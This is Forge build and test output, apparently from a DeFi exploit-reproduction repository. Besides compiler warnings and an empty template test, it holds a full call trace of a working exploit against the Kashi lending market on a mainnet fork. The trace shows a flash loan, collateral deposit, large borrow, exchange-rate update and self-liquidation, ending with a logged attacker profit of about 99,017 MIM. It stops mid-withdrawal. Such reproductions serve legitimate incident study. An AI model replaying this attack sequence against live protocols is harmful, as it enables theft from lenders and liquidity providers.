Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.26s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2022-11/Kashi_exp.sol:58:5:
   |
58 |     IERC20 WETH = IERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-11/Kashi_exp.sol:85:9:
   |
85 |         address sender,
   |         ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-11/Kashi_exp.sol:86:9:
   |
86 |         IERC20[] calldata tokens,
   |         ^^^^^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-11/Kashi_exp.sol:87:9:
   |
87 |         uint256[] calldata amounts,
   |         ^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-11/Kashi_exp.sol:88:9:
   |
88 |         uint256[] calldata fees,
   |         ^^^^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-11/Kashi_exp.sol:89:9:
   |
89 |         bytes calldata data
   |         ^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 613.91ms (4.77ms CPU time)

Ran 1 test for src/test/2022-11/Kashi_exp.sol:ContractTest
[PASS] testExploit() (gas: 572006)
Logs:
  [End] Attacker MIM balance after exploit: 99017.794034640229088298

Traces:
  [5779] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 15928289 [1.592e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [657206] ContractTest::testExploit()
    ├─ [24555] 0x99D8a9C45b2ecA8864373A26D1459e3Dff1e17F3::approve(0xd9e1cE17f2641f24aE83637ab66a2cca9C378B9F, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xd9e1cE17f2641f24aE83637ab66a2cca9C378B9F, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0xcd3497fafbfb091f23164107ea0c57486cde17375ac6d0adb0876f1f3ce8bff1: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [608852] 0xF5BCE5077908a1b7370B9ae04AdC565EBd643966::batchFlashLoan(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496, 0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], [0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272, 0x99D8a9C45b2ecA8864373A26D1459e3Dff1e17F3], [450000000000000000000000 [4.5e23], 0], 0x00)
    │   ├─ [30046] 0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 450000000000000000000000 [4.5e23])
    │   │   ├─ emit Transfer(from: 0xF5BCE5077908a1b7370B9ae04AdC565EBd643966, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 450000000000000000000000 [4.5e23])
    │   │   ├─  storage changes:
    │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x000000000000000000000000000000000000000000005f4a8c8375d155400000
    │   │   │   @ 0x665c543999f0cf3a92f4b5af56f9aa8ace16b2da8d7f076cf522abaad51e82df: 0x00000000000000000000000000000000000000000000d33a2474a44e92b53fe8 → 0x0000000000000000000000000000000000000000000073ef97f12e7d3d753fe8
    │   │   └─ ← [Return] true
    │   ├─ [2385] 0x99D8a9C45b2ecA8864373A26D1459e3Dff1e17F3::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   │   ├─ emit Transfer(from: 0xF5BCE5077908a1b7370B9ae04AdC565EBd643966, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 0)
    │   │   └─ ← [Return] true
    │   ├─ [552394] ContractTest::onBatchFlashLoan(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], [0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272, 0x99D8a9C45b2ecA8864373A26D1459e3Dff1e17F3], [450000000000000000000000 [4.5e23], 0], [225000000000000000000 [2.25e20], 0], 0x00)
    │   │   ├─ [29394] 0xF5BCE5077908a1b7370B9ae04AdC565EBd643966::setMasterContractApproval(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x4a9Cb5D0B755275Fd188f87c0A8DF531B0C7c7D2, true, 0, 0x0000000000000000000000000000000000000000000000000000000000000000, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   │   │   ├─ emit LogSetMasterContractApproval(param0: 0x4a9Cb5D0B755275Fd188f87c0A8DF531B0C7c7D2, param1: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: true)
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x34168c2991b92b9d75053283925dc10c6b710e72444f29eef761915a6c79ad4e: 0 → 1
    │   │   │   └─ ← [Stop]
    │   │   ├─ [24563] 0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272::approve(0xF5BCE5077908a1b7370B9ae04AdC565EBd643966, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xF5BCE5077908a1b7370B9ae04AdC565EBd643966, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xd6027713649db96a7427593ee05c61077713986bcab6a15bce4505d409ad8efc: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   └─ ← [Return] true
    │   │   ├─ [39738] 0xF5BCE5077908a1b7370B9ae04AdC565EBd643966::deposit(0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 420000000000000000000000 [4.2e23])
    │   │   │   ├─ [6013] 0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xF5BCE5077908a1b7370B9ae04AdC565EBd643966, 420017306191357694229751 [4.2e23])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xF5BCE5077908a1b7370B9ae04AdC565EBd643966, value: 420017306191357694229751 [4.2e23])
    │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xF5BCE5077908a1b7370B9ae04AdC565EBd643966, value: 115792089237316195423570985008687907853269984665640563619440277816555435410184 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x665c543999f0cf3a92f4b5af56f9aa8ace16b2da8d7f076cf522abaad51e82df: 0x0000000000000000000000000000000000000000000073ef97f12e7d3d753fe8 → 0x00000000000000000000000000000000000000000000cce0c6fe38777e41fcdf
    │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000005f4a8c8375d155400000 → 0x0000000000000000000000000000000000000000000006595d766bd714734309
    │   │   │   │   │   @ 0xd6027713649db96a7427593ee05c61077713986bcab6a15bce4505d409ad8efc: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffa70ed0f2f605bf334308
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ emit LogDeposit(param0: 0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272, param1: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param3: 420017306191357694229751 [4.2e23], param4: 420000000000000000000000 [4.2e23])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xdc713e4788f18364979da14df02d721734a3959fa76f1b0c669b11ca2398a95d: 0x000000000000d337ea137c345bdaf5b5000000000000d33a2474a44e92b53e0c → 0x0000000000012c2828f494d59a5af5b50000000000012c2b5381ae48d381fb03
    │   │   │   │   @ 0x9ab559b979f9128f90f5e84d944863dd68bdfd8533dec3495a6f30d87a75ba75: 0 → 0x0000000000000000000000000000000000000000000058f03ee118a13e800000
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000058f12f0d09fa40ccbcf70000000000000000000000000000000000000000000058f03ee118a13e800000
    │   │   ├─ [46445] 0xbb02A884621FB8F5BFd263A67F58B65df5b090f3::addCollateral(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], false, 420000000000000000000000 [4.2e23])
    │   │   │   ├─ [43764] 0x4a9Cb5D0B755275Fd188f87c0A8DF531B0C7c7D2::addCollateral(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], false, 420000000000000000000000 [4.2e23]) [delegatecall]
    │   │   │   │   ├─ [11249] 0xF5BCE5077908a1b7370B9ae04AdC565EBd643966::transfer(0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xbb02A884621FB8F5BFd263A67F58B65df5b090f3, 420000000000000000000000 [4.2e23])
    │   │   │   │   │   ├─ emit LogTransfer(param0: 0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272, param1: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 0xbb02A884621FB8F5BFd263A67F58B65df5b090f3, param3: 420000000000000000000000 [4.2e23])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xf21bb6dc87e9907dc6d373ae3b3cb33a5e9180d74724467730bf998256d108ec: 0x00000000000000000000000000000000000000000000006f76ceb429f80846dc → 0x00000000000000000000000000000000000000000000595fb5afcccb368846dc
    │   │   │   │   │   │   @ 0x9ab559b979f9128f90f5e84d944863dd68bdfd8533dec3495a6f30d87a75ba75: 0x0000000000000000000000000000000000000000000058f03ee118a13e800000 → 0
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ emit LogAddCollateral(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 420000000000000000000000 [4.2e23])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x3707462b181da5757afb393000713f9d89955f52c38cceeebf01e0b050d6ff3e: 0 → 0x0000000000000000000000000000000000000000000058f03ee118a13e800000
    │   │   │   │   │   @ 6: 0x00000000000000000000000000000000000000000000006f76ceb429f80846dc → 0x00000000000000000000000000000000000000000000595fb5afcccb368846dc
    │   │   │   │   └─ ← [Stop]
    │   │   │   └─ ← [Return]
    │   │   ├─ [80238] 0xbb02A884621FB8F5BFd263A67F58B65df5b090f3::borrow(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 800000000000000000000000 [8e23])
    │   │   │   ├─ [80057] 0x4a9Cb5D0B755275Fd188f87c0A8DF531B0C7c7D2::borrow(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 800000000000000000000000 [8e23]) [delegatecall]
    │   │   │   │   ├─ emit LogAccrue(: 185897055146848840 [1.858e17])
    │   │   │   │   ├─ [3137] 0xF5BCE5077908a1b7370B9ae04AdC565EBd643966::toShare(0x99D8a9C45b2ecA8864373A26D1459e3Dff1e17F3, 800000000000000000000000 [8e23], false) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000a9681639627b01c899a8
    │   │   │   │   ├─ [30658] 0xF5BCE5077908a1b7370B9ae04AdC565EBd643966::transfer(0x99D8a9C45b2ecA8864373A26D1459e3Dff1e17F3, 0xbb02A884621FB8F5BFd263A67F58B65df5b090f3, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 799999998408058791827880 [7.999e23])
    │   │   │   │   │   ├─ emit LogTransfer(param0: 0x99D8a9C45b2ecA8864373A26D1459e3Dff1e17F3, param1: 0xbb02A884621FB8F5BFd263A67F58B65df5b090f3, param2: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param3: 799999998408058791827880 [7.999e23])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x83515b6aaac456746f934e3c04c091481e5bc9ae9c003bb359f3f890ecbb32df: 0x00000000000000000000000000000000000000000000ab266ed55eebff62d750 → 0x0000000000000000000000000000000000000000000001be589bfc70fd9a3da8
    │   │   │   │   │   │   @ 0x20473f51e52fdaeb21ff28e3327b2eca821ea292ab03216132449e1c48b02cee: 0 → 0x00000000000000000000000000000000000000000000a9681639627b01c899a8
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ emit LogBorrow(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 800400000000000000000000 [8.004e23], param3: 783386582353063701986335 [7.833e23])
    │   │   │   │   ├─ [1127] 0xF5BCE5077908a1b7370B9ae04AdC565EBd643966::toAmount(0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272, 315000000000000000000000000000000000000000 [3.15e41], false) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000039dbd6d095f4388a78ba8c5e08f3926d10f
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 7: 0x000000000000007ba13f0ad65ad68be7000000000000007e4e048e2f9f6ec457 → 0x000000000000a65f1a01f4f352cfc806000000000000a9fc15f5819fe080769f
    │   │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0 → 0x00000000000000000000000000000000000000000000a5e378c2ea1cf7f93c1f
    │   │   │   │   │   @ 11: 0x0000000000000000000000000000000000000000000000000000000063684803 → 0x000000000000000000000000000000000294706300d1b24800000000636ad7b3
    │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000a5e378c2ea1cf7f93c1f00000000000000000000000000000000000000000000a9681639627b01c899a8
    │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000a5e378c2ea1cf7f93c1f00000000000000000000000000000000000000000000a9681639627b01c899a8
    │   │   ├─ [66072] 0xbb02A884621FB8F5BFd263A67F58B65df5b090f3::updateExchangeRate()
    │   │   │   ├─ [65900] 0x4a9Cb5D0B755275Fd188f87c0A8DF531B0C7c7D2::updateExchangeRate() [delegatecall]
    │   │   │   │   ├─ [47421] 0x00632CFe43d8F9f8E6cD0d39Ffa3D4fa7ec73CFB::get(0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000e4e58df3956bc6423a62e87ddd99ca3120f1dd4b00000000000000000000000000000000000000000000000000000002540be400)
    │   │   │   │   │   ├─ [43685] 0xe4E58DF3956BC6423a62e87ddd99Ca3120F1dD4B::latestAnswer() [staticcall]
    │   │   │   │   │   │   ├─ [14637] 0x5f4eC3Df9cbd43714FE2740f5E3616155c5b8419::latestAnswer() [staticcall]
    │   │   │   │   │   │   │   ├─ [7141] 0x37bC7498f4FF12C19678ee8fE19d713b87F6a9e6::latestAnswer() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 133498964688 [1.334e11]
    │   │   │   │   │   │   │   └─ ← [Return] 133498964688 [1.334e11]
    │   │   │   │   │   │   ├─ [2321] 0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272::totalSupply() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 52907566559345780559045212 [5.29e25]
    │   │   │   │   │   │   ├─ [2578] 0x6B3595068778DD592e39A122f4f5a5cF09C90fE2::balanceOf(0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 71230695898687529329064652 [7.123e25]
    │   │   │   │   │   │   ├─ [14592] 0xe572CeF69f43c2E488b33924AF04BDacE19079cf::latestAnswer() [staticcall]
    │   │   │   │   │   │   │   ├─ [7096] 0xd01BBB3Afed2cb5ca92Ca3834d441dc737F0Da70::latestAnswer() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 1042815203109275 [1.042e15]
    │   │   │   │   │   │   │   └─ ← [Return] 1042815203109275 [1.042e15]
    │   │   │   │   │   │   └─ ← [Return] 187428078156435712480613376 [1.874e26]
    │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000076781f983c69954
    │   │   │   │   ├─ emit LogExchangeRate(: 533537989524363604 [5.335e17])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 10: 0x000000000000000000000000000000000000000000000000056258d7ec79888a → 0x000000000000000000000000000000000000000000000000076781f983c69954
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000076781f983c69954
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000076781f983c69954
    │   │   ├─ [57180] 0xbb02A884621FB8F5BFd263A67F58B65df5b090f3::liquidate([0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], [680000000000000000000000 [6.8e23]], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x0000000000000000000000000000000000000000)
    │   │   │   ├─ [56969] 0x4a9Cb5D0B755275Fd188f87c0A8DF531B0C7c7D2::liquidate([0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], [680000000000000000000000 [6.8e23]], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x0000000000000000000000000000000000000000) [delegatecall]
    │   │   │   │   ├─ [8421] 0x00632CFe43d8F9f8E6cD0d39Ffa3D4fa7ec73CFB::get(0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000e4e58df3956bc6423a62e87ddd99ca3120f1dd4b00000000000000000000000000000000000000000000000000000002540be400)
    │   │   │   │   │   ├─ [7185] 0xe4E58DF3956BC6423a62e87ddd99Ca3120F1dD4B::latestAnswer() [staticcall]
    │   │   │   │   │   │   ├─ [2137] 0x5f4eC3Df9cbd43714FE2740f5E3616155c5b8419::latestAnswer() [staticcall]
    │   │   │   │   │   │   │   ├─ [1141] 0x37bC7498f4FF12C19678ee8fE19d713b87F6a9e6::latestAnswer() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 133498964688 [1.334e11]
    │   │   │   │   │   │   │   └─ ← [Return] 133498964688 [1.334e11]
    │   │   │   │   │   │   ├─ [321] 0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272::totalSupply() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 52907566559345780559045212 [5.29e25]
    │   │   │   │   │   │   ├─ [578] 0x6B3595068778DD592e39A122f4f5a5cF09C90fE2::balanceOf(0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 71230695898687529329064652 [7.123e25]
    │   │   │   │   │   │   ├─ [2092] 0xe572CeF69f43c2E488b33924AF04BDacE19079cf::latestAnswer() [staticcall]
    │   │   │   │   │   │   │   ├─ [1096] 0xd01BBB3Afed2cb5ca92Ca3834d441dc737F0Da70::latestAnswer() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 1042815203109275 [1.042e15]
    │   │   │   │   │   │   │   └─ ← [Return] 1042815203109275 [1.042e15]
    │   │   │   │   │   │   └─ ← [Return] 187428078156435712480613376 [1.874e26]
    │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000076781f983c69954
    │   │   │   │   ├─ emit LogExchangeRate(: 533537989524363604 [5.335e17])
    │   │   │   │   ├─ [686] 0xF5BCE5077908a1b7370B9ae04AdC565EBd643966::totals(0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000012c2b5381ae48d381fb03000000000000000000000000000000000000000000012c2828f494d59a5af5b5
    │   │   │   │   ├─ [1127] 0xF5BCE5077908a1b7370B9ae04AdC565EBd643966::toAmount(0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272, 315000000000000000000000000000000000000000 [3.15e41], false) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000039dbd6d095f4388a78ba8c5e08f3926d10f
    │   │   │   │   ├─ emit LogRemoveCollateral(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 417003633781822147542951 [4.17e23])
    │   │   │   │   ├─ emit LogRepay(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 694768090570515549015615 [6.947e23], param3: 680000000000000000000000 [6.8e23])
    │   │   │   │   ├─ [1420] 0xF5BCE5077908a1b7370B9ae04AdC565EBd643966::toShare(0x99D8a9C45b2ecA8864373A26D1459e3Dff1e17F3, 694768090570515549015615 [6.947e23], true) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000931f741e0d5e0b0faefa
    │   │   │   │   ├─ [23858] 0xF5BCE5077908a1b7370B9ae04AdC565EBd643966::transfer(0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272, 0xbb02A884621FB8F5BFd263A67F58B65df5b090f3, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 417003633781822147542951 [4.17e23])
    │   │   │   │   │   ├─ emit LogTransfer(param0: 0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272, param1: 0xbb02A884621FB8F5BFd263A67F58B65df5b090f3, param2: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param3: 417003633781822147542951 [4.17e23])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x9ab559b979f9128f90f5e84d944863dd68bdfd8533dec3495a6f30d87a75ba75: 0 → 0x00000000000000000000000000000000000000000000584dcff1d8a02f003fa7
    │   │   │   │   │   │   @ 0xf21bb6dc87e9907dc6d373ae3b3cb33a5e9180d74724467730bf998256d108ec: 0x00000000000000000000000000000000000000000000595fb5afcccb368846dc → 0x000000000000000000000000000000000000000000000111e5bdf42b07880735
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [4449] 0xF5BCE5077908a1b7370B9ae04AdC565EBd643966::transfer(0x99D8a9C45b2ecA8864373A26D1459e3Dff1e17F3, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xbb02A884621FB8F5BFd263A67F58B65df5b090f3, 694768089187978107137786 [6.947e23])
    │   │   │   │   │   ├─ emit LogTransfer(param0: 0x99D8a9C45b2ecA8864373A26D1459e3Dff1e17F3, param1: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 0xbb02A884621FB8F5BFd263A67F58B65df5b090f3, param3: 694768089187978107137786 [6.947e23])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x20473f51e52fdaeb21ff28e3327b2eca821ea292ab03216132449e1c48b02cee: 0x00000000000000000000000000000000000000000000a9681639627b01c899a8 → 0x000000000000000000000000000000000000000000001648a21b551cf6b8eaae
    │   │   │   │   │   │   @ 0x83515b6aaac456746f934e3c04c091481e5bc9ae9c003bb359f3f890ecbb32df: 0x0000000000000000000000000000000000000000000001be589bfc70fd9a3da8 → 0x0000000000000000000000000000000000000000000094ddccba09cf08a9eca2
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0x00000000000000000000000000000000000000000000a5e378c2ea1cf7f93c1f → 0x0000000000000000000000000000000000000000000015e4990d54859ef93c1f
    │   │   │   │   │   @ 0x3707462b181da5757afb393000713f9d89955f52c38cceeebf01e0b050d6ff3e: 0x0000000000000000000000000000000000000000000058f03ee118a13e800000 → 0x0000000000000000000000000000000000000000000000a26eef40010f7fc059
    │   │   │   │   │   @ 6: 0x00000000000000000000000000000000000000000000595fb5afcccb368846dc → 0x000000000000000000000000000000000000000000000111e5bdf42b07880735
    │   │   │   │   │   @ 7: 0x000000000000a65f1a01f4f352cfc806000000000000a9fc15f5819fe080769f → 0x00000000000016603a4c5f5bf9cfc80600000000000016dca1d28ad8c0542860
    │   │   │   │   └─ ← [Stop]
    │   │   │   └─ ← [Return]
    │   │   ├─ [805] 0xF5BCE5077908a1b7370B9ae04AdC565EBd643966::balanceOf(0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   └─ ← [Return] 417003633781822147542951 [4.17e23]
    │   │   ├─ [9902] 0xF5BCE5077908a1b7370B9ae04AdC565EBd643966::withdraw(0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 417003633781822147542951 [4.17e23])
    │   │   │   ├─ [3346] 0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 417020816507258057209622 [4.17e23])
    │   │   │   │   ├─ emit Transfer(from: 0xF5BCE5077908a1b7370B9ae04AdC565EBd643966, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 417020816507258057209622 [4.17e23])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x665c543999f0cf3a92f4b5af56f9aa8ace16b2da8d7f076cf522abaad51e82df: 0x00000000000000000000000000000000000000000000cce0c6fe38777e41fcdf → 0x0000000000000000000000000000000000000000000074920897121856cac5c9
